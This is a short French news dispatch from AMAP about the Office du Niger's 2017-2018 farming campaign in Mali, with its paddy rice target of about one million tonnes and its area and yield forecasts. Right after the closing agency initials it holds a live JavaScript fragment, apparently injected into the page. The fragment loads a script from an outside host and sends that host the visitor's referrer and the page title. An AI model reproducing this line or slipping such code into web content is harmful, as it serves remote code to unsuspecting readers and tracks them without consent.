Le PDG de l’Office du Niger satisfait de l’évolution de la campagne agricole

Ségou,11 octobre (AMAP) Le président directeur général de l’Office du Niger, Dr Mamadou M’Barè Coulibaly, a déclaré être très optimiste pour l’issue de la campagne de la campagne agricole 2017-2018 en zone Office du Niger.

M. Coulibaly s’exprimait après avoir sillonné, la semaine dernière, la zone de production de Niono et les casiers de Molodo, N’Débougou et Kouroumari .

« Ce que nous avons vu dans ces quatre zones prouve que nous sommes sur la bonne voie pour atteindre le million de tonnes de riz paddy qui est l’objectif principal de la présente campagne agricole », a affirmé le PDG de l’Office.

« Nous sommes très satisfaits de ce que nous avons vu sur le terrain dans le cadre de la supervision de la campagne agricole et l’espoir est permis», a-t-il ajouté.

Le patron de l’Office a confié à la presse que les prévisions des superficies totales à mettre en valeur sont de 158.405 ha pour une production prévisionnelle de l’ordre de 1.001.345 tonnes de paddy et un rendement attendu de 6,321 tonnes par hectare.

S’agissant des activités de maraîchage (toutes spéculations confondues), ce sont 11.620 ha qui seront mis en valeur pour une production totale de 341.045 tonnes alors que les cultures de diversifications (toutes spéculations confondues) seront de l’ordre de 10.649 ha pour une production de 115.755 tonnes.

DC/MS (AMAP)s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Laisser un commentaire